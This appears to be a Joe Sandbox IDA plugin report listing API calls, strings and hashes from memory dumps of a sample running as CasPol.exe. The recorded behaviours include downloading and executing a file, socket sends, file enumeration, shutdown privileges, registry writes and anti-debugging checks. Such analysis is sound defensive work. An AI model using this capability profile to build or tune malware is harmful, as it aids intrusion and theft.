                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Find$CreateFirstNext
                                                                                                                    • String ID: @CG$XCG$>G
                                                                                                                    • API String ID: 341183262-3030817687
                                                                                                                    • Opcode ID: 6f6c8383ede3b99deae024da16e9075e46d497d9da1f27495e7f84a067efd9b4
                                                                                                                    • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                                                                                                                    • Opcode Fuzzy Hash: 6f6c8383ede3b99deae024da16e9075e46d497d9da1f27495e7f84a067efd9b4
                                                                                                                    • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                      • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                      • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                      • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                      • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                    • String ID: PowrProf.dll$SetSuspendState
                                                                                                                    • API String ID: 1589313981-1420736420
                                                                                                                    • Opcode ID: f2258adae91e008b6bbe8d53d562ac2432b0fccb6b9bb8c14df452b20ce69b50
                                                                                                                    • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                                                                                                                    • Opcode Fuzzy Hash: f2258adae91e008b6bbe8d53d562ac2432b0fccb6b9bb8c14df452b20ce69b50
                                                                                                                    • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 0045128C
                                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 004512B5
                                                                                                                    • GetACP.KERNEL32(?,?,00451512,?,00000000), ref: 004512CA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale
                                                                                                                    • String ID: ACP$OCP
                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                    • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                    • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                                                                                                                    • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                    • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                                                                                                                    APIs
                                                                                                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                                                                                                                    • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                    • String ID: SETTINGS
                                                                                                                    • API String ID: 3473537107-594951305
                                                                                                                    • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                    • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                                                                                                                    • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                    • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514D3
                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,00443CFC,00000040,?,00443E1C,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00443D7C,00000040), ref: 004515A4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 745075371-0
                                                                                                                    • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                    • Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
                                                                                                                    • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                    • Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1157919129-0
                                                                                                                    • Opcode ID: 134fb9258ab0cdae9c79f5a052adaa00df324bba5dabcaa7350581133739d8c7
                                                                                                                    • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                                                                                                                    • Opcode Fuzzy Hash: 134fb9258ab0cdae9c79f5a052adaa00df324bba5dabcaa7350581133739d8c7
                                                                                                                    • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
                                                                                                                    APIs
                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                                                                                                    • _free.LIBCMT ref: 00448077
                                                                                                                      • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                    • _free.LIBCMT ref: 00448243
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1286116820-0
                                                                                                                    • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                    • Instruction ID: 9f73030e0ab81e705d7e97d576e5185c64763d3f00745452c155363557a16cba
                                                                                                                    • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                                    • Instruction Fuzzy Hash: 97512A718002099BE714EF69CC829BF77BCEF44364F11026FE454A32A1EB389E46CB58
                                                                                                                    APIs
                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: DownloadExecuteFileShell
                                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                                                    • API String ID: 2825088817-4197237851
                                                                                                                    • Opcode ID: 51ec5b72d808d2940468360efcd3f6a48f6bfd3c4046981a37eba07d625ba236
                                                                                                                    • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                                                                                                                    • Opcode Fuzzy Hash: 51ec5b72d808d2940468360efcd3f6a48f6bfd3c4046981a37eba07d625ba236
                                                                                                                    • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$FirstNextsend
                                                                                                                    • String ID: x@G$x@G
                                                                                                                    • API String ID: 4113138495-3390264752
                                                                                                                    • Opcode ID: a4191051616dd2d18e811883544a6dbf9a8de57a63793eb4ab1ec45789776d1d
                                                                                                                    • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                                                                                                                    • Opcode Fuzzy Hash: a4191051616dd2d18e811883544a6dbf9a8de57a63793eb4ab1ec45789776d1d
                                                                                                                    • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                                    APIs
                                                                                                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                      • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                      • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                      • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                    • API String ID: 4127273184-3576401099
                                                                                                                    • Opcode ID: a245bcba594aafc3506fa3fd8a5928f5fbb82046cba1041144db6cf1cc865380
                                                                                                                    • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                                                                                                                    • Opcode Fuzzy Hash: a245bcba594aafc3506fa3fd8a5928f5fbb82046cba1041144db6cf1cc865380
                                                                                                                    • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443D03,?,?,?,?,?,?,00000004), ref: 00450B71
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00450C01
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00450C0F
                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443D03,00000000,00443E23), ref: 00450CB2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4212172061-0
                                                                                                                    • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                    • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                                                                                                                    • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                                    • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$FirstH_prologNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 301083792-0
                                                                                                                    • Opcode ID: 58399aac76a8de55f741da6846de5bb5d14ae8a66ade689f7e8fb58cf754ddd7
                                                                                                                    • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                                                                                                                    • Opcode Fuzzy Hash: 58399aac76a8de55f741da6846de5bb5d14ae8a66ade689f7e8fb58cf754ddd7
                                                                                                                    • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2829624132-0
                                                                                                                    • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                                    • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                                                                                                                    • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                                    • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                                                                                                                    APIs
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0043A765
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0043A76F
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0043A77C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3906539128-0
                                                                                                                    • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                    • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                                                                                                                    • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                    • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                                                                                                                    APIs
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3906539128-0
                                                                                                                    • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                    • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                    • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                    • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,0044253A,?), ref: 00442585
                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,0044253A,?), ref: 0044258C
                                                                                                                    • ExitProcess.KERNEL32 ref: 0044259E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1703294689-0
                                                                                                                    • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                    • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                                                                                                                    • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                    • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                    • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
